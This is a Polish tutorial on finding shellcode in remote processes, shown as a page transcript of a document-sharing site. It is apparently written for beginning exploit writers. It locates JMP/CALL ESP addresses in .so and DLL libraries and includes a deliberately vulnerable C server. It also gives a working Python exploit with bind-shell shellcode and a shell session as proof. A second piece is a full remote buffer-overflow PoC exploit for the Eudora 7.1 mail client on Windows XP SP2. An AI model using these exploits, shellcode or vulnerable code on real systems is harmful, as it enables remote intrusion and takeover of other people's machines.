[ Odnajdywanie shellcodu w procesach zdalnych. ]

Wielkość: px
Rozpocząć pokaz od strony:

Download "[ Odnajdywanie shellcodu w procesach zdalnych. ]"

Transkrypt

1 [ Odnajdywanie shellcodu w procesach zdalnych. ] Autor: Krystian Kloskowski (h07) -http://milw0rm.com/author/668 -http://www.h07.int.pl 0x00 [INTRO] Do właściwego zrozumienia treści tego artykułu konieczna jest znajomość podstaw assemblera x86 oraz wiedza ogólna na temat błędów naruszeń pamięci. Z wielu materiałów dostępnych w sieci jak i w ksiąŝkach moŝna dowiedzieć się czym jest przepełnienie bufra oraz jak je wykorzystać. Jednak większość opisów tej techniki włamań opiera się na eksploitacji lokalnej. Eksploitacja zdalna a właściwe odnalezienie shellcodu w aplikacji zdalnej nadal pozostaje niejasne dla wielu początkujących twórców exploitów. Niniejszy artykuł opisuje technikę odnajdywania shellcodu w pamięci procesów zdalnych pracujących pod kontrolą systemów UNIX, Windows. 0x01 [TEORIA] Większość tradycyjnych exploitów lokalnych wykorzystujących błędy w oprogramowaniu UNIX'owym odnajduje shellcode poprzez "strzelanie" w offset lub posługując się adresem zmiennej środowiskowej. Jednak odgadywanie adresu pod którym znajduje się shellcode w procesie zdalnym przyniosłoby marny efekt i byłoby czynnością chaotyczną poniewaŝ nie mielibyśmy dostępu ani do wartości rejestrów procesora ani do zmiennych środowiskowych. Ponadto taka "praktyka" w ogóle nie nadawałaby się do eksploitacji programów pracujących pod kontrolą systemu Windows poniewaŝ Windows opiera się na wątkach pracujących na tych samych danych w obrębie jednego procesu. Jakikolwiek błąd naruszenia pamięci spowodowałby zakończenie całego programu uniemoŝliwiając włamanie. Zatem jak poradzić sobie z tym problemem? Wyobraźmy sobie sytuacje, w której po przepełnieniu bufora adres powrotu został nadpisany adresem rozkazu JMP ESP lub CALL ESP. W takiej sytuacji sterowanie zostanie automatycznie przekazane do kodu znajdującego się na stosie a skuteczność exploitu będzie zaleŝna tylko od jednego czynniku. Jak się domyślacie, czynnikiem tym będzie adres, pod którym znajduje się rozkaz JMP ESP lub CALL ESP. Taki adres określany jest terminem "opcode". 0x02 [UNIX, wykorzystanie "opcodów" z bibliotek.so] Biblioteki.so przechowują "zewnętrzne" funkcje z których mogą korzystać programy pracujące pod kontrolą systemów UNIX. Z punktu widzenia przestrzeni adresowej pierwszy bajt kodu funkcji z biblioteki.so zawsze ładowany jest pod tym samym adresem. Sprawdźmy to.. C]$ echo 'main(){int a = 0;}' > prog1.c C]$ echo 'main(){int a = 0; int b = 1;}' > prog2.c C]$ gcc -o prog1 prog1.c C]$ gcc -o prog2 prog2.c C]$ ldd prog1 linux-gate.so.1 => (0xffffe000) libc.so.6 => /lib/tls/libc.so.6 (0x ) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x ) C]$ ldd prog2 linux-gate.so.1 => (0xffffe000)

2 libc.so.6 => /lib/tls/libc.so.6 (0x ) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x ) C]$ objdump -D /lib/ld-linux.so.2 grep "<system_dirs>" 00010c80 <system_dirs>: C]$ gdb prog1 (gdb) break main Breakpoint 1 at 0x (gdb) run Starting program: /home/h07/c/prog1 Breakpoint 1, 0x in main () (gdb) disas system_dirs Dump of assembler code for function system_dirs: 0x40010c80 <system_dirs+0>: das 0x40010c81 <system_dirs+1>: insb (%dx),%es:(%edi) 0x40010c82 <system_dirs+2>: imul $0x73752f00,0x2f(%edx),%esp 0x40010c89 <system_dirs+9>: jb 0x40010cba <undefined_msg+2> 0x40010c8b <system_dirs+11>: insb (%dx),%es:(%edi) 0x40010c8c <system_dirs+12>: imul $0x500,0x2f(%edx),%esp End of assembler dump. C]$ gdb prog2 (gdb) break main Breakpoint 1 at 0x (gdb) run Starting program: /home/h07/c/prog2 Breakpoint 1, 0x in main () (gdb) disas system_dirs Dump of assembler code for function system_dirs: 0x40010c80 <system_dirs+0>: das 0x40010c81 <system_dirs+1>: insb (%dx),%es:(%edi) 0x40010c82 <system_dirs+2>: imul $0x73752f00,0x2f(%edx),%esp 0x40010c89 <system_dirs+9>: jb 0x40010cba <undefined_msg+2> 0x40010c8b <system_dirs+11>: insb (%dx),%es:(%edi) 0x40010c8c <system_dirs+12>: imul $0x500,0x2f(%edx),%esp End of assembler dump. Z powyŝszego przykładu łatwo moŝemy zauwaŝyć, Ŝe w przestrzeniach adresowych dwóch róŝnych programów adres pierwszego rozkazu funkcji system_dirs() jest zawsze taki sam. Fakt ten jest kluczowy poniewaŝ jesli "opcode" będzie znajdował się w bibliotece.so to jego adres zawsze będzie taki sam dla danej dystrybucji systemu dzięki czemu exploit uzyska niezawodność co z kolei daje moŝliwość sprawnego przeprowadzenia ataku zdalnego. Spróbujmy zatem napisać exploit dla poniŝszego serwera, wykorzystując opcode do odnalezienia shellcodu w pamięci. //serv.c #include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #define PORT 4444 struct sockaddr_in server, client; char global_buf[4096]; void vuln(char *arg) { char local_buf[256]; strcpy(local_buf, arg); printf("[+] Client request: %s\n", local_buf); } int main(void) { int sock = socket(af_inet, SOCK_STREAM, IPPROTO_TCP); if(sock == -1) {

3 } printf("[-] Socket error\n"); return -1; server.sin_family = AF_INET; server.sin_addr.s_addr = htonl(inaddr_any); server.sin_port = htons(port); int retval = bind(sock, (struct sockaddr *) &server, sizeof(server)); if(retval == -1) { printf("[-] Bind error\n"); close(sock); return -1; } listen(sock, 1); printf("[+] Listening on %d\n", PORT); int len = sizeof(client); int cl = accept(sock, (struct sockaddr *) &client, &len); printf("[+] Connection accepted from %s\n", inet_ntoa(client.sin_addr)); recv(cl, global_buf, sizeof(global_buf) - 1, 0); vuln(global_buf); } close(cl); close(sock); return 0; Jak widać funkcja vuln() serwera podatna jest na przepełnienie bufora. W pierwszej kolejności musimy wyświetlić biblioteki.so uŝywane przez serwer. C]$ gcc -o serv serv.c C]$ ldd serv linux-gate.so.1 => (0xffffe000) libc.so.6 => /lib/tls/libc.so.6 (0x ) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x ) Teraz naleŝy znaleźć opcode a właściwie funkcje, w której występuje opcode JMP ESP lub CALL ESP. Do tego celu uŝyjemy narzędzia objdump oraz dowolnego edytora tekstu, któremu zlecimy szukanie rozkazu "call *%esp". Warto przypomnieć, Ŝe narzędzie analizujące objdump oraz debugger gdb posługują się notacją assemblera AT&T, z tąd teŝ dziwny dla niektórych zapis szukanego rozkazu. C]$ objdump -D /lib/ld-linux.so.2 > a.txt C]$ kwrite a.txt 00010cb8 <undefined_msg>: 10cb8: 75 6e jne 10d28 <undefined_msg+0x70> 10cba: e imul $0x2064,%fs:%gs:0x65(%esi),%bp 10cc1: 20 10cc2: jae 10d3d <undefined_msg+0x85> 10cc4: 6d insl (%dx),%es:(%edi) 10cc5: 62 6f 6c bound %ebp,0x6c(%edi) 10cc8: 3a 20 cmp (%eax),%ah... 10cde: add %al,(%eax) 10ce0: ca 4b ff lret $0xff4b 10ce3: ff f7 push %edi 10ce5: 4b dec %ebx 10ce6: ff (bad) 10ce7: ff d4 call *%esp Edytor tekstu odnalazł opcode w funkcji undefined_msg(). MoŜemy teraz przystąpić do odczytania adresu opcode z wirtualnej przestrzeni adresowej procesu serwera. C]$ gdb serv (gdb) break main

4 Breakpoint 1 at 0x80485b9 (gdb) run Starting program: /home/h07/c/serv Breakpoint 1, 0x080485b9 in main () (gdb) disas undefined_msg Dump of assembler code for function undefined_msg: 0x40010cb8 <undefined_msg+0>: jne 0x40010d28 <undefined_msg+112> 0x40010cba <undefined_msg+2>: imul $0x2064,%fs:%gs:0x65(%esi),%bp 0x40010cc2 <undefined_msg+10>: jae 0x40010d3d <undefined_msg+133> 0x40010cc4 <undefined_msg+12>: insl (%dx),%es:(%edi) 0x40010cc5 <undefined_msg+13>: bound %ebp,0x6c(%edi) 0x40010cc8 <undefined_msg+16>: cmp (%eax),%ah 0x40010cca <undefined_msg+18>: add %al,(%eax) 0x40010ccc <undefined_msg+20>: add %al,(%eax) 0x40010cce <undefined_msg+22>: add %al,(%eax) 0x40010cd0 <undefined_msg+24>: add %al,(%eax) 0x40010cd2 <undefined_msg+26>: add %al,(%eax) 0x40010cd4 <undefined_msg+28>: add %al,(%eax) 0x40010cd6 <undefined_msg+30>: add %al,(%eax) 0x40010cd8 <undefined_msg+32>: add %al,(%eax) 0x40010cda <undefined_msg+34>: add %al,(%eax) 0x40010cdc <undefined_msg+36>: add %al,(%eax) 0x40010cde <undefined_msg+38>: add %al,(%eax) 0x40010ce0 <undefined_msg+40>: lret $0xff4b 0x40010ce3 <undefined_msg+43>: push %edi 0x40010ce5 <undefined_msg+45>: dec %ebx 0x40010ce6 <undefined_msg+46>: (bad) 0x40010ce7 <undefined_msg+47>: call *%esp... Bingo, adres 0x40010ce7 jest adresem rozkazu CALL ESP, który przekaŝe sterowanie automatycznie do kodu znajdującego się na stosie. Napisanie exploitu jest tylko formalnością, chociaŝ w sposobie eksploitacji zajdą niewielkie zmiany. Rejestr ESP przechowuje adres wierzchołka stosu. Gdy funkcja kończy swoje działanie i wykonywany jest rozkaz RET to ów rozkaz pobiera adres powrotny z miejsca wskazywanego przez rejestr ESP. Jeśli za sprawą opcodu CALL ESP sterowanie zostanie przekazane na stos to oczywisty staje się fakt, Ŝe shellcode musi znajdować się za adresem powrotnym umieszczonym na stosie, poniewaŝ adres ten wskazywany jest przez rejestr ESP przy wychodzeniu z funkcji. Zawartość bufora tradycyjnych exploitów lokalnych: [NOP's][Shellcode][Return address] Zawartość bufora exploitu wykorzystującego opcode JMP/CALL ESP: [Any_Data][Return address][nop's][shellcode] Metodą prób ustalamy, Ŝe do nadpisania adresu powrotnego funkcji vuln() serwera potrzeba 272 bajtów. Wszystkie te informacje składamy w "całość" pisząc explit.. #!/usr/bin/python from time import sleep from struct import pack from socket import * host = ' ' port = 4444 opcode = 0x40010ce7 # /lib/ld-linux.so.2 <undefined_msg+47>: CALL ESP # linux_ia32_bind (TCP PORT 5555) shellcode = ( "\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79" "\x40\xb8\xd6\x83\xeb\xfc\xe2\xf4\x48\x9b\xeb\x95\x2a\x2a\xba\xbc" "\x1f\x18\x21\x5f\x98\x8d\x38\x40\x3a\x12\xde\xbe\x6c\xf3\xde\x85" "\xf0\xa1\xd2\xb0\x21\x10\xe9\x80\xf0\xa1\x75\x56\xc9\x26\x69\x35" "\xb4\xc0\xea\x84\x2f\x03\x31\x37\xc9\x26\x75\x56\xea\x2a\xba\x8f" "\xc9\x7f\x75\x56\x30\x39\x41\x66\x72\x12\xd0\xf9\x56\x33\xd0\xbe" "\x56\x22\xd1\xb8\xf0\xa3\xea\x85\xf0\xa1\x75\x56") buf = "A" * 268 buf += pack("<l", opcode) buf += "\x90" * 32

5 buf += shellcode # buf = [A * 268][Return address(opcode)][nop * 32][Shellcode] s = socket(af_inet, SOCK_STREAM) s.connect((host, port)) s.send(buf) sleep(1) s.close() Kod exploitu jest tak prosty, Ŝe nie wymaga tłumaczenia ;] Uruchamiamy serwer i eksploitujemy.. C]$./serv [+] Listening on 4444 C:\>exp.py C:\>nc -v MD5 [ ] 5555 (?) open whoami h07 echo $SHELL /bin/bash Exploit wstrzyknął do procesu serwera shellcode, który dał dostęp do powłoki systemu na porcie TCP Dzięki zastosowaniu opcodu ów exploit uzyskał niezawodność i kaŝdy "atak" na przykładowy serwer zawsze powiedzie się sukcesem bez "zgadywania" adresu i innych tym podobnych praktyk. Jedynym czynnikiem wpływającym na skuteczność exploitu jest sam opcode, który róŝny jest dla róŝnych dystrybucji systemu. 0x03 [WINDOWS, wykorzystanie "opcodów" z bibliotek DLL] Biblioteki DLL znacznie róŝnią się budową od UNIX'owych bibliotek.so jednak idea eksploitacji oprogramowania z uŝyciem "opcodów" w systemie Windows jest analogiczna do systemu UNIX. Istotnym elementem bibliotek DLL jest wirtualny adres względny RVA (Relative Virtual Address). KaŜda funkcja w bibliotece DLL posiada swój adres RVA określający jej względne połoŝenie. Jeśli do adresu pierwszego bajtu pliku załadowanego do pamięci (Image Base) dodamy adres RVA to otrzymamy wirtualny adres funkcji w przestrzeni adresowej procesu (VA - Virtual Address). Dla przykładu pierwszy bajt (Image Base) biblioteki X został załadowany pod adresem 0x Funkcja foo() biblioteki X posiada RVA 4000 zatem jej wirtualny adres (VA) w procesie równy jest 0x (Image Base + RVA = VA) Ale po co to wszystko? Specyficzny sposób adresowania pamięci przez biblioteki DLL wykorzystywany jest przez disassemblery, które sumując Image Base i RVA wyświetlają rzeczywiste adresy wirtualne funkcji bez potrzeby załadowania biblioteki do konkretnego procesu. Fakt ten znacznie ułatwia odnalezienie danego opcodu w bibliotece DLL, sprowadzając sam proces szukania do uŝycia jednego narzędzia (np disassemblera objdump). Równie wygodnym sposobem przeszukiwania bibliotek DLL w poszukiwaniu określonych rozkazów jest uŝycie debuggera OllyDbg lub narzędzia findjmp. Przykład uŝycia programu findjmp: C:\>findjmp shell32.dll ESP > a.txt C:\>more a.txt /E Reg: ESP Scanning shell32.dll for code usable with the ESP register 0x7C9DEA11 push ESP - ret 0x7CA06F76 push ESP - ret 0x7CA58265 jmp ESP 0x7CA62587 call ESP 0x7CA6487B call ESP 0x7CB1289F jmp ESP 0x7CB3C1F6 jmp ESP 0x7CBBD38B call ESP 0x7CBFA14C jmp ESP 0x7CBFB8C4 call ESP 0x7CC00AC4 call ESP 0x7CC00EB0 call ESP

6 0x7CC00FE8... jmp ESP Przykładowy exploit wykorzystujący opcode JMP ESP i wstrzykujący shellcode do procesu programu pocztowego Eudora 7.1 pracującego pod kontrolą systemu Windows XP SP2.. #!/usr/bin/python # Eudora 7.1 SMTP Response 0day Remote Buffer Overflow PoC Exploit # Bug discovered by Krystian Kloskowski (h07) # Tested on Eudora / XP SP2 Polish # Shellcode type: Windows Execute Command (calc.exe) # Note:.. # This vulnerability can be exploited only if user # will ignore warning about "buffer overflow" error. ## from struct import pack from time import sleep from socket import * bind_addr = ' ' bind_port = 25 shellcode = ( "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8" "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1" "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07" "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25" "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5" "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d" "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4" "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0" "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c" "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b" "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4") opcode = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish) buf = "250-" buf += "A" * 76 buf += pack("<l", opcode) buf += "\x90" * 32 buf += shellcode buf += "\r\n" s = socket(af_inet, SOCK_STREAM) s.bind((bind_addr, bind_port)) s.listen(1) print "Listening on %s:%d..." % (bind_addr, bind_port) cl, addr = s.accept() print "Connected accepted from: %s" % (addr[0]) cl.send('220 Dupa Jasia\r\n') print cl.recv(1024)[:-1] cl.send(buf) sleep(1) cl.close() s.close() print "Done" # EoF # milw0rm.com [ ] Myślę, Ŝe kod exploitu nie wymaga tłumaczenia poniewaŝ jego sposób działania jest analogiczny do exploitu zaprezentowanego w poprzednim podpunkcie tego artykułu. 0x04 [OUTRO] Warto wspomnieć, Ŝe istnieją jeszcze inne grupy rozkazów, które mogą być wykorzystane do przekazania sterowania w odpowiednie miejsce. Na przykład moŝe zdarzyć się, Ŝe podczas przepełnienia bufora rejestr ECX wskazuje adres bufora z shellcodem. W takim wypadku moŝna nadpisać

7 adres powrotu adresem rozkazu CALL ECX co w rezultacie przekaŝe sterowanie wprost do shellcodu. "Opcode" PUSH ECX RET dałby taki sam efekt. Przykładem "opcodów egzotycznych" jest blok rozkazów POP POP RET. Taka kombinacja rozkazów pozawala na przekazanie sterowania na stos tuŝ za nadpisanymi wskaźnikami procedur obsługi wyjątków. Metoda ta bardzo często stosowana jest przy tworzeniu exploitów wykorzystujących przepełnienia bufora w usługach DCE-RPC systemu Windows. Artykuł ten jest dość "lajtowy" ale na pewno pomoŝe on zrozumieć techniki odnajdywania shellcodu w pamięci procesów zdalnych wszystkim początkującym twórcom exploitów. 0x05 [LINKI] OllyDbg - Findjmp - Windows Opcode Database - Variations in Exploit methods between Linux and Windows - https://www.blackhat.com/presentations/bh-usa-03/bhus-03-litchfield-paper.pdf More info about buffer overflow in Eudora 7.1 (CVE ) - EoF;

Błędy łańcuchów formatujących (format string) by h07 (h07@interia.pl)

Błędy łańcuchów formatujących (format string) by h07 (h07@interia.pl) Błędy łańcuchów formatujących (format string) by h07 (h07@interia.pl) Intro. Łańcuchy formatujące umieszczone w funkcjach z rodziny printf() (lub innych funkcjach, których parametrem jest łańcuch formatujący)

Bardziej szczegółowo

Beej s Guide to Network Programming

Beej s Guide to Network Programming Używanie gniazd internetowych Brian "Beej" Hall beej@piratehaven.org Bartosz Zapałowski bartek@klepisko.eu.org Copyright 1995-2001 Brian "Beej" Hall Historia zmian Zmiana Wersja 1.0.0 Sierpień, 1995 Revised

Bardziej szczegółowo

Praktyczna aplikacja do analizy Malware

Praktyczna aplikacja do analizy Malware Praktyczna aplikacja do analizy Malware Praktyka Rubén Santamarta stopień trudności Dzień za dniem badacze malware, analitycy sądowi czy administratorzy muszą stawiać czoła zagrożeniu bezpieczeństwa systemów

Bardziej szczegółowo

W skrócie 6. Zawartość CD 8. Atak. Obrona. hakin9

W skrócie 6. Zawartość CD 8. Atak. Obrona. hakin9 hakin9 Witamy! Lato w pełni i mamy nadzieję, że nasi czytelnicy podczas swoich urlopów nie zapomną o nas i zakupią lipcowy numer hakin9 jak się obronić. Gorąco polecamy artykuł z działu atak: Praktyczny

Bardziej szczegółowo

ZagroŜenia usługi DNS

ZagroŜenia usługi DNS BIULETYN INSTYTUTU AUTOMATYKI I ROBOTYKI NR 25, 2008 ZagroŜenia usługi DNS Marek BORZYM, Zbigniew SUSKI Instytut Teleinformatyki i Automatyki WAT ul. Gen. S. Kaliskiego 2, 00-908 Warszawa, WyŜsza Szkoła

Bardziej szczegółowo

Wykorzystanie OpenSSL w programowaniu bezpiecznych aplikacji

Wykorzystanie OpenSSL w programowaniu bezpiecznych aplikacji Wykorzystanie OpenSSL w programowaniu bezpiecznych aplikacji Szkolenie działu KDM PCSS, Poznań, 28.02.2006r. Gerard Frankowski Zespół Bezpieczeństwa PCSS 1 Niniejsza prezentacja ma na celu zaprezentowanie

Bardziej szczegółowo

Adam Zabrocki http://pi3.hack.pl pi3@itsec.pl (lub oficjalnie: adam.zabrocki@avet.com.pl)

Adam Zabrocki http://pi3.hack.pl pi3@itsec.pl (lub oficjalnie: adam.zabrocki@avet.com.pl) Włamania do systemów w Linux Adam Zabrocki http://pi3.hack.pl pi3@itsec.pl (lub oficjalnie: adam.zabrocki@avet.com.pl) Włamania do systemów w Linux Dlaczego Linux? Jądro 2.4 a 2.6 Włamania do systemów

Bardziej szczegółowo

Artykuł jest skierowany przede wszystkim

Artykuł jest skierowany przede wszystkim Piszemy własny moduł PAM Andrzej Nowak Na CD: Na dołączonej do pisma płycie CD zamieszczone są wykorzystywane w artykule programy i dokumentacja. Artykuł jest skierowany przede wszystkim do administratorów

Bardziej szczegółowo

protokołu IPSec. Gerard Frankowski Poznańskie Centrum Superkomputerowo Sieciowe Zespół Bezpieczeństwa

protokołu IPSec. Gerard Frankowski Poznańskie Centrum Superkomputerowo Sieciowe Zespół Bezpieczeństwa Zabezpieczanie komunikacji sieciowej przy pomocy protokołu IPSec. Gerard Frankowski Poznańskie Centrum Superkomputerowo Sieciowe Zespół Bezpieczeństwa Poznań, 30.01.2007 1 Witam Państwa serdecznie na szkoleniu

Bardziej szczegółowo

Zanurkuj w Pythonie. Stworzone na Wikibooks, bibliotece wolnych podręczników.

Zanurkuj w Pythonie. Stworzone na Wikibooks, bibliotece wolnych podręczników. Zanurkuj w Pythonie Stworzone na Wikibooks, bibliotece wolnych podręczników. Wydanie I z dnia 17 lutego 2008 Copyright c 2005-2008 użytkownicy Wikibooks. Permission is granted to copy, distribute and/or

Bardziej szczegółowo

Zespół Szkół im. Adama Wodziczki w Mosinie. Roman Zalewski Mariusz Bocian. Szkodniki komputerowe i zagroŝenia w sieci

Zespół Szkół im. Adama Wodziczki w Mosinie. Roman Zalewski Mariusz Bocian. Szkodniki komputerowe i zagroŝenia w sieci Zespół Szkół im. Adama Wodziczki w Mosinie Roman Zalewski Mariusz Bocian Szkodniki komputerowe i zagroŝenia w sieci Mosina 2005/2006 Praca wykonana podczas zajęć przedmiotu: przetwarzanie informacji w

Bardziej szczegółowo

Programowanie wizualne Borland C++ Builder Materiały szkoleniowe

Programowanie wizualne Borland C++ Builder Materiały szkoleniowe Programowanie wizualne Borland C++ Builder Materiały szkoleniowe 1 1. Spis treści Programowanie wizualne Borland C++ Builder 1. Spis treści... 2 2. Wstęp... 4 3. Środowisko Borland C++ Builder... 5 Struktura

Bardziej szczegółowo

System plików działający poza jądrem systemu operacyjnego Linux

System plików działający poza jądrem systemu operacyjnego Linux Akademia Górniczo-Hutnicza im. Stanisława Staszica wkrakowie Praca magisterska System plików działający poza jądrem systemu operacyjnego Linux Jan Wróbel Kierunek: Informatyka Specjalność: Systemy rozproszone

Bardziej szczegółowo

Narzędzia. Początki. Atak. hakin9. Witam! W skrócie 6. Zawartość CD 10. Recenzja NETASQ NA-F60 12. Recenzja Panda Internet Security 2007 13

Narzędzia. Początki. Atak. hakin9. Witam! W skrócie 6. Zawartość CD 10. Recenzja NETASQ NA-F60 12. Recenzja Panda Internet Security 2007 13 hakin9 Witam! Jako że redagujemy pismo, dotyczące bezpieczeństwa IT, często bywamy na konferencjach poświęconych temu tematowi. Zaciekawiła nas jedna z nich, a mianowicie konferencja o piractwie komputerowym,

Bardziej szczegółowo

Bazy danych w środowisku Oracle. Instalacja narzędzi Oracle: konfiguracja serwera i klienta

Bazy danych w środowisku Oracle. Instalacja narzędzi Oracle: konfiguracja serwera i klienta UPGOW Uniwersytet Partnerem Gospodarki Opartej na Wiedzy Uniwersytet Śląski w Katowicach, ul. Bankowa 12, 40-007 Katowice, http://www.us.edu.pl Zadanie 43 Bazy danych w środowisku Oracle Instalacja narzędzi

Bardziej szczegółowo

Język C# W VISUAL STUDIO 2005 EXPRESS

Język C# W VISUAL STUDIO 2005 EXPRESS Leszek Klich Michał Andruchów Język C# W VISUAL STUDIO 2005 EXPRESS Programowanie aplikacji w środowisku.net 2.0 podstawy teoretyczne, opis środowiska Visual Studio, wstęp do języka C#, aplikacje konsolowe,

Bardziej szczegółowo

Gniazda. S. Samolej: Gniazda 1

Gniazda. S. Samolej: Gniazda 1 Gniazda dr inż. Sławomir Samolej Katedra Informatyki i Automatyki Politechnika Rzeszowska Program przedmiotu oparto w części na materiałach opublikowanych na: http://wazniak.mimuw.edu.pl/ oraz na materiałach

Bardziej szczegółowo

Technika mikrokomputerowa

Technika mikrokomputerowa Wojskowa Akademia Techniczna im. J. Dąbrowskiego Technika mikrokomputerowa Parametry konfiguracyjne sytemu Windows CE Wykonał: Mirosław Lewandowski Grupa: I4X2S0 1 1. Wstęp Windows CE po raz pierwszy został

Bardziej szczegółowo

Szyfrowanie w aplikacjach biblioteka Openssl

Szyfrowanie w aplikacjach biblioteka Openssl Szyfrowanie w aplikacjach biblioteka Openssl Obrona Paweł Maziarz stopień trudności Informacja w dzisiejszych czasach to jedna z bardziej cennych rzeczy, dlatego trzeba o nią odpowiednio zadbać. Sieci

Bardziej szczegółowo

Bezpieczeństwo komunikatorów sieciowych na przykładzie komunikatora Gadu-Gadu

Bezpieczeństwo komunikatorów sieciowych na przykładzie komunikatora Gadu-Gadu Bezpieczeństwo komunikatorów sieciowych na przykładzie komunikatora Gadu-Gadu 1. Historia rozwoju Gadu-Gadu jest pierwszym polskim programem, umożliwiającym komunikacje w Internecie wykorzystującym technologię

Bardziej szczegółowo

Uwierzytelnienie i autoryzacja

Uwierzytelnienie i autoryzacja Polsko-Japońska WyŜsza Szkoła Technik Komputerowych Uwierzytelnienie i autoryzacja Kazimierz Subieta, Edgar Głowacki edgar.glowacki@pjwstk.edu.pl 1 Co to jest bezpieczeństwo informacji? (1) Zgodnie z U.S.

Bardziej szczegółowo

część 5 biblioteka standardowa wejścia - wyjścia łańcuchowe wejście - wyjście Jarosław Gramacki Instytut Informatyki i Elektroniki

część 5 biblioteka standardowa wejścia - wyjścia łańcuchowe wejście - wyjście Jarosław Gramacki Instytut Informatyki i Elektroniki Język ANSI C część 5 biblioteka standardowa wejścia - wyjścia łańcuchowe wejście - wyjście Jarosław Gramacki Instytut Informatyki i Elektroniki Łańcuchowe wejście-wyjście podejście bardzo podobne do znakowego

Bardziej szczegółowo

Instalator systemu mmedica

Instalator systemu mmedica Instalator systemu mmedica Dokumentacja uŝytkownika wersja 1.1.5.2 data 2007-08-24 Spis treści 1. Przygotowanie do instalacji 3 1.1. Wymagania instalatora 3 1.2. Wymagane elementy i moŝliwości instalacji

Bardziej szczegółowo

Administrowanie systemem operacyjnym Unix 312 [01].Z4.02

Administrowanie systemem operacyjnym Unix 312 [01].Z4.02 MINISTERSTWO EDUKACJI i NAUKI Ewa Sromala Administrowanie systemem operacyjnym Unix 312 [01].Z4.02 Poradnik dla ucznia Wydawca Instytut Technologii Eksploatacji Państwowy Instytut Badawczy Radom 2005 Recenzenci:

Bardziej szczegółowo

Analiza porównawcza języków procedur składowanych PL/SQL, SQL PL, PL/pgSQL i T-SQL

Analiza porównawcza języków procedur składowanych PL/SQL, SQL PL, PL/pgSQL i T-SQL POLITECHNIKA WARSZAWSKA Wydział Elektroniki i Technik Informacyjnych PRACA DYPLOMOWA MAGISTERSKA Marta Bańkowska Nr albumu: 161484 Analiza porównawcza języków procedur składowanych PL/SQL, SQL PL, PL/pgSQL

Bardziej szczegółowo

Systemy operacyjne. Wprowadzenie. Wykład prowadzą: Jerzy Brzeziński Dariusz Wawrzyniak

Systemy operacyjne. Wprowadzenie. Wykład prowadzą: Jerzy Brzeziński Dariusz Wawrzyniak Wykład prowadzą: Jerzy Brzeziński Dariusz Wawrzyniak Celem wykładu jest przedstawienie ogólnych informacji o systemie operacyjnym jako składowej oprogramowania komputera. Omawiana jest zatem jego rola

Bardziej szczegółowo

POWERSHELL DLA PROGRAMISTÓW (NIE TYLKO.NET)

POWERSHELL DLA PROGRAMISTÓW (NIE TYLKO.NET) POWERSHELL DLA PROGRAMISTÓW (NIE TYLKO.NET) PowerShell to interpreter poleceń oraz powłoka skryptowa firmy Microsoft. Została ona opracowana jako następca command.com i cmd.exe znana z systemów takich

Bardziej szczegółowo

Architektura zorientowana na usługi. Ćwiczenia laboratoryjne

Architektura zorientowana na usługi. Ćwiczenia laboratoryjne Architektura zorientowana na usługi. Ćwiczenia laboratoryjne SKRYPT Krzysztof Rzecki Wydział Fizyki, Matematyki i Informatyki Politechniki Krakowskiej Kraków 2011 Materiały dydaktyczne zostały przygotowane

Bardziej szczegółowo

UserGate Proxy & Firewall Podręcznik administratora

UserGate Proxy & Firewall Podręcznik administratora UserGate Proxy & Firewall Podręcznik administratora Spis treści WSTĘP... 4 USERGATE PROXY & FIREWALL... 4 WYMAGANIA SYSTEMOWE... 5 INSTALACJA SERWERA USERGATE... 5 REJESTRACJA USERGATE... 5 AKTUALIZOWANIE

Bardziej szczegółowo

POLITECHNIKA ŚLĄSKA. Wydział InŜynierii Materiałowej i Metalurgii. Zarządzanie i InŜynieria Produkcji

POLITECHNIKA ŚLĄSKA. Wydział InŜynierii Materiałowej i Metalurgii. Zarządzanie i InŜynieria Produkcji POLITECHNIKA ŚLĄSKA Wydział InŜynierii Materiałowej i Metalurgii Zarządzanie i InŜynieria Produkcji Specjalność: Zarządzanie systemami informatycznymi PRACA MAGISTERSKA DAWID STRZEMPA SYSTEM INTERNETOWY

Bardziej szczegółowo